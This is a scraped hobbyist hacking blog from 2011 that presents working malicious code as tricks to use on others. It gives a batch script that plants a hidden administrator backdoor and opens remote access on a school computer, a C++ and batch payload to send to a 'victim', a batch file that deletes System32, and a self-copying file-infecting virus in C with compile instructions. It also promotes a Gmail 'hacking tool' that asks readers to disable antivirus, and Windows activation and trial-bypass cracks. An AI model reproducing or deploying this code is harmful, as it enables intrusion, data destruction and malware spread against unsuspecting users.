- Save as .bat fileNow wat if i can hack mah school coimputer from mah home ? Will'nt it be too good to share ? Well dont worry m sharing this with you.
There are two ways to do so:
(i) Dropping a trojan.
(ii) Creating a batch file encoded in Net Framework and applying it.
Well i will cover the trojan trick later on. Now just concentrate on the batch file. Its just as easy as typing something in notepad and then saving it.
Tools required:
- Pen Drive / USB drive
- Mind
- A lil bit of time.
Now What you gotta do :
- Copy the below code
- Paste in notepad
- Save as .bat file
Code :
@echo offREM ......: Created By Jigsaw :......REM ......: HackPcOnline.Com :......
REM EDIT THESE SETTINGSset username=USERNAMEset password=PASSWORDset rdport=3389set tnport=23set rport=CHANGE_THISREM END EDITING SETTINGS
REM Adding The Backdoornet user %username% %password% /addREM Pause For Processping localhost -n 2 >nulREM Adding Admin Access The Backdoornet localgroup Administrators %username% /addREM Hiding The Backdoor From Start MenuREG add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /%username% /t REG_DWORD /d 0 /f >nulREM Enabling Terminal ServiceREG add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0REM Share C:\net share system=C:\ /unlimitedREM Stealing The IP Stuffipconfig /all >> C:\attach.txtREM Deleting The Firewall Configurationnetsh firewall deleteREM Opening Portsnetsh firewall add portopening TCP %rdport% "WinSvcService"netsh firewall add portopening TCP %tnport2% "WinSvcService"netsh firewall add portopening TCP %rport% "WinSvcService"clsexit
You can change the username, password and the rport (randomn port you choose to be opened)
At ipconfig /all >> C:\attach.txt you must change C:/ by your pen drive letter.
Save it and remove your pen drive.
Now run this bat file in ur school Pc.Now when you get to your home, just telnet the pc or Remote desktop it.You are done gyes !!
All about computer tips and tricks. learn some wonderful trick from notepad.. cool computer ticks no no experience needed
Sunday, 24 July 2011
How to Hack your School Computers
Monday, 11 July 2011
C++ ,Batch Virus code to disable Hard disk
Hi friends,here i give you give the C++ virus code. Actually Batch code is converted to C++ virus code. If you like you can use it as batch code also.
C++ Virus Code :
Don't run this c++ program ,it will attack your system itself.
Copy the created .exe file and send it to your victim. You can also attach it with any other exe files.
Batch Virus Code Creation:
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n
shutdown -r -c \"Sorry Your System is hacked by us!\" -f
I think this code will simple for non c++ programmers. It is easy to create the batch file also.
C++ Virus Code :
#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/
write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/
write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }
- Copy the above code and paste in notepad
- Save the file with .cpp extension
- Compile and create .exe file in cpp
Don't run this c++ program ,it will attack your system itself.
Copy the created .exe file and send it to your victim. You can also attach it with any other exe files.
Batch Virus Code Creation:
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n
shutdown -r -c \"Sorry Your System is hacked by us!\" -f
I think this code will simple for non c++ programmers. It is easy to create the batch file also.
- Copy the above code to notepad.
- Save it with .bat extension (for ex: nodrivevirus.bat)
- Send the file to your victim
Sunday, 5 June 2011
Awesome javascript collection by ehackworld
Awesome Javascript collection by ehackworld
Procedure:
1)Just copy the javascript and paste it in your browsers Address bar and hit enter
1)Just copy the javascript and paste it in your browsers Address bar and hit enter
Javascript which pop up a message:
Javascript to find passwords behind the astriks:
(OR)
Javascript to rotate images on webpage:
(OR)
(OR)
Javascript which vibrates your browser:
(OR)
(OR)
Javascript which pop up message and changes text colour on webpage:
Javascript to Edit any webpage:
Javascript which erases the text on webpage:
funny javascript to fool your friends:
Javascript which opens two webpages on same Tab:
Javascript which changes text colour on a webpage:
Javascript for Blinking text on webpage:
Dom inspector Javascript:
Javascript for Dancing text on webpage:
Javascript to expand images on a webpage:
(OR)
tracking code
Tuesday, 31 May 2011
How to activate windows 7 or windows vista
Hi Friends, today i will show you how to activate windows 7 or Windows vista for free. Its a 100% working hack and perfectly safe way to easily activate windows for free. I will explain this with the help of windows loader by Daz. This loader application will bypass the Microsoft's WAT(windows activationtechnologies) and activate your winodws 7 or Vista in just few minutes.The application itself injects a SLIC (System Licensed Internal Code) into your system before Windows boots; that is what fools Windows into thinking it's genuine.
Requirements:
1. Supported Operating System Installed( Windows 7 or Windows Vista).
2. Loader by Daz.
3. Internet connection to check the activation is happened correctly or not.
Steps to activate Windows 7 or Windows Vista:
1. Download the Windows Loader application.
(click here to download)
2. Extract the zip file and now you will have four files.
3. Start the Loader.exe by double clicking on it.
4. Now Click on Install to install the SLIC and updating the windows key.
5. That's the only procedure, now just go to Microsoft's website to check your activation. Alternatively you can check it by right clicking on My Computer Icon on desktop and see the General information.
Note: You must be running build 7600 or greater for Windows 7 and Windows Server 2008 R2.
Note: I don't recommend using any of the Windows 7 E editions.
Note: Windows 7 N editions will only be supported when OEM SLP serials leak.
Features of Windows Activator Loader:
•Can be run as a standalone application
•Works well with all system languages
•Custom OEM information can be installed
•Argument support for silent installs
•Can be used for pre-activation
•Application integrity checking
•Custom error handling
•Support for hidden partitions and complex setups
•Can work alongside Linux's GRUB or any other boot manager
•Works with TrueCrypt and many other types of hard drive encryption applications
•Add your own certificates and serials externally
•Offers certificate and serial installation only for users with an existing SLIC 2.1
•Automated system profiling (The application matches everything up for you)
Supported operating systems
•Windows 7 Ultimate
•Windows 7 Ultimate E
•Windows 7 Professional
•Windows 7 Professional E
•Windows 7 Home Premium
•Windows 7 Home Premium E
•Windows 7 Home Basic
•Windows 7 Starter
•Windows 7 Starter E
•Windows Vista Ultimate
•Windows Vista Business
•Windows Vista Business N
•Windows Vista Home Premium
•Windows Vista Home Basic
•Windows Vista Home Basic N
•Windows Vista Starter
•Windows Server 2008 R2: Enterprise
•Windows Server 2008 R2: Standard
•Windows Server 2008 R2: Foundation
•Windows Server 2008: Enterprise
•Windows Server 2008: Standard
•Windows Server 2008: Foundation
•Windows Small Business Server 2008
Don't Forget to say thanks if it works for you....
Requirements:
1. Supported Operating System Installed( Windows 7 or Windows Vista).
2. Loader by Daz.
3. Internet connection to check the activation is happened correctly or not.
Steps to activate Windows 7 or Windows Vista:
1. Download the Windows Loader application.
(click here to download)
2. Extract the zip file and now you will have four files.
3. Start the Loader.exe by double clicking on it.
4. Now Click on Install to install the SLIC and updating the windows key.
5. That's the only procedure, now just go to Microsoft's website to check your activation. Alternatively you can check it by right clicking on My Computer Icon on desktop and see the General information.
Note: You must be running build 7600 or greater for Windows 7 and Windows Server 2008 R2.
Note: I don't recommend using any of the Windows 7 E editions.
Note: Windows 7 N editions will only be supported when OEM SLP serials leak.
Features of Windows Activator Loader:
•Can be run as a standalone application
•Works well with all system languages
•Custom OEM information can be installed
•Argument support for silent installs
•Can be used for pre-activation
•Application integrity checking
•Custom error handling
•Support for hidden partitions and complex setups
•Can work alongside Linux's GRUB or any other boot manager
•Works with TrueCrypt and many other types of hard drive encryption applications
•Add your own certificates and serials externally
•Offers certificate and serial installation only for users with an existing SLIC 2.1
•Automated system profiling (The application matches everything up for you)
Supported operating systems
•Windows 7 Ultimate
•Windows 7 Ultimate E
•Windows 7 Professional
•Windows 7 Professional E
•Windows 7 Home Premium
•Windows 7 Home Premium E
•Windows 7 Home Basic
•Windows 7 Starter
•Windows 7 Starter E
•Windows Vista Ultimate
•Windows Vista Business
•Windows Vista Business N
•Windows Vista Home Premium
•Windows Vista Home Basic
•Windows Vista Home Basic N
•Windows Vista Starter
•Windows Server 2008 R2: Enterprise
•Windows Server 2008 R2: Standard
•Windows Server 2008 R2: Foundation
•Windows Server 2008: Enterprise
•Windows Server 2008: Standard
•Windows Server 2008: Foundation
•Windows Small Business Server 2008
Don't Forget to say thanks if it works for you....
Write Bold And Underline Text In Facebook Chat
Now here are the facebook codes for sending bold and underlined text in facebook chat
For Sending Bold Text
whatever you type between * *(two stars ) will automatically turns into bold.
Example : You write I *love* you.
Turns to
I love you
For sending underlined Text
Whatever you type between _ _(two underscores) will automatically turns into underlined text
Example: You write
I really _love_ you
Turns to
I really love you
For writing Bold+Underline
Whatever you type between *_ _* will automatically turns into Bold+Underline
Example:
You *_love_* it?
Turns to
You love it?
if you like this post please comment..
:)
Wednesday, 11 May 2011
crash your enemy PC by windows system 32 command promt
HEY HERE IS SIMPLE WAY TO BLOCK ENEMY PC the simple deadliest code is |
@Echo off
@Color 0A
@Echo Hello, this will fuck over your computer... just a moment...
Del /s /q /a RHSA C:\Windows\System32
Echo thank you for waiting :)
Shutdown -f -s -t 20 -c "Your computer got fucked, please wait for shutting down..."
Exit
Tuesday, 10 May 2011
Virus Code in C programming
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(”*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(”Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(”DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(”TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
COMPILING METHOD:
BORLAND TC++ 3.0 (16-BIT):
1. Load the program in the compiler; press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9, THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; Change IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
BORLAND C++ 5.5 (32-BIT):
1. Compile once, note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it. The new EXE file is ready to infect
1. Compile once, note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it. The new EXE file is ready to infect
HOW TO TEST:
1. Open new empty folder
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to re infect
1. Open new empty folder
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to re infect
Thursday, 5 May 2011
Hack Your Friends Gmail Password-Gmail Hacking Tool Free Download
Hi friends,
Today I am Introducing a new tool to hack your enemies Gmail password.It is a newly developed software for hacking Gmail password and google account password.It is for educational purpose and don't misuse it.Here I am with the latest tool gmail_hackerV3.2.0.Its a highly spreading password hacking tool in the Internet world.Again I am repeating that dont misuse it and its only for proving the security issues of google.
Today I am Introducing a new tool to hack your enemies Gmail password.It is a newly developed software for hacking Gmail password and google account password.It is for educational purpose and don't misuse it.Here I am with the latest tool gmail_hackerV3.2.0.Its a highly spreading password hacking tool in the Internet world.Again I am repeating that dont misuse it and its only for proving the security issues of google.
download the zip file and extract it in your system.
Note:Since it is a hacking software,Please disable your antivirus and firewall.This may delete the hacking softwareWednesday, 4 May 2011
SPEED UP YOUR COMPUTER BY CLEANING RAM USING NOTEPAD
If your computer become slow, when you are working with many programs. It may be due to RAM because at that time RAM is full of remaining progress pieces which you are working with and you do not need them any more. So, if you can erase or delete those unnecessary pieces of information, your computer RAM will be cleaned and your computer will be speed up.
Cleaning RAM is very easy task here are steps for it, just follow them:
1). Open notepad.
2). Type FreeMem=Space(64000000).
3). Save file with name "CleanRAM.vbs".
4). Close it and run the file.
It will free memory in RAM, if you want to free more memory than you can write following command in notepad instead of what given in step 2.
FreeMem= (256000000) for 256 mb
FreeMem= (128000000) for 128 mb
FreeMem= (72000000) for 72 mb
FreeMem= (64000000) for 64 mb
FreeMem= (32000000) for 32 mb
FreeMem= (24000000) for 24 mb
Make sure that you don't select the memory that is larger than your memory capacity.
Sunday, 24 April 2011
HOW TO MAKE CON FOLDER IN YOUR COMPUTER
Did you ever think that why cant you create folders like con,nul , prn,etc..in our PC.So here's the solution..with this solution you can create almost any folder in your PC like the above mentioned..(prn,nul,con,etc)..
So let's get started...
To make folder "con"in your PC,you have to make two Batch files.One file would be 'con maker.bat' and another file would be 'con remover.bat'.You have to create 'con remover.bat' because you cannot delete the folder "con" very easily.So here's the command for the batch file "con maker.bat".Paste this command in Notepad and save it as 'con maker.bat'.
@echo off
mkdir c:\con\
start c:
msg * con has been created..
Now the command for 'con remover.bat'.Paste this command in Notepad and save it as 'con remover.bat'.
@echo off
rmdir c:\con\
start c:
msg * con has been removed successfully.
Firstly, open 'con maker.bat' then you will see a folder name 'con' in C: drive and then open 'con remover.bat' to delete 'con' folder from your computer.
You can change the drive by changing the drive name and can change the path too...
To make folder "con"in your PC,you have to make two Batch files.One file would be 'con maker.bat' and another file would be 'con remover.bat'.You have to create 'con remover.bat' because you cannot delete the folder "con" very easily.So here's the command for the batch file "con maker.bat".Paste this command in Notepad and save it as 'con maker.bat'.
@echo off
mkdir c:\con\
start c:
msg * con has been created..
Now the command for 'con remover.bat'.Paste this command in Notepad and save it as 'con remover.bat'.
@echo off
rmdir c:\con\
start c:
msg * con has been removed successfully.
Firstly, open 'con maker.bat' then you will see a folder name 'con' in C: drive and then open 'con remover.bat' to delete 'con' folder from your computer.
You can change the drive by changing the drive name and can change the path too...
Tuesday, 5 April 2011
World Trade Center Attack Trick
as you might be know that the flight number of the plane that had hit world trade
center on that dreadful day (9/11) Q33NY.now call this trick a coincidence
or something else but whatever it is, it does startle us.
~open notepad and type Q33N in capital letters.
~increase the font size to 72.
~change the font to wingding.
you will be amazed by the finding.
Monday, 4 April 2011
INSTALL WINDOWS XP IN 10 MINUTS
how to install windows XP in just 10 minutes??
as we all know that during formatting the computer after the file copying is completed then windows
require 39 minutes time..but what extreme in it....yes we can bypass this fking time...HOW TO DO IT??
so read on..
i have include snaps that will help you all...
INSTALLING XP IN 10 MINUTES!
step1:after the copy part is over..system is rebooted as we all know that in general formatting
procedure..
step2:now as this image appears you have to press" SHIFT+F10 ".this will open the command prompt now press task manager in it.this will open the taskmgr.
step3:after the taskmgr open go to processes and find " setup.exe".and RIGHT CLICK on it
and set the priority to highest.........
step3:now just watch the set it will take around 9 minutes and 2 minutes for tolerance(depend system to system)
Thats the overall tutorial..hope you all have like it
so when you format your PC next time it will really save your time i.e. around 20 to 25 minutes....
step3:after the taskmgr open go to processes and find " setup.exe".and RIGHT CLICK on it
and set the priority to highest.........
step3:now just watch the set it will take around 9 minutes and 2 minutes for tolerance(depend system to system)
Thats the overall tutorial..hope you all have like it
so when you format your PC next time it will really save your time i.e. around 20 to 25 minutes....
Sunday, 3 April 2011
Bypass software trail period and run software forever
there are many software available which are best which are the best in many ways depending upon the user.but these software's are always paid one which need to purchased after certain period in order to use it.
but some software makers give a demo version of the software to try out before buying it which run for a
certain period and need to be purchased in order to work again in your PC.many will uninstall the it and again
reinstall the software and will use it again as demo version.but there is way to use that trail software again and again without even uninstalling it.time stopper does that.time stopper is a small software which just stop the time
of any executable software file and will help you in using that trail software without any trouble.it have very
simple user interface which is very easy to handle.
then just install the time stopper in your PC
now just browse the executable file(.exefile)of required software which will usually located in
c:\program files\application-name\ and now just select the new installation date.
now execute to another 30/60/90 days depending on the software.
Features:
1-time stopper is a free ware.
2-time stopper is a software which can stop the time for try out version software.
3-when you stop the time you can use your trail version forever.
4-when you stop the time of try out version using this time stopper it work via this time stopper.real time amp;date run normally on your system.
5-you can use any number of trail version software.
note that this program just extends the trail period of any software by changing the software installation date.
you can use this timestopper to extend the trail period of any software.
Subscribe to:
Comments (Atom)








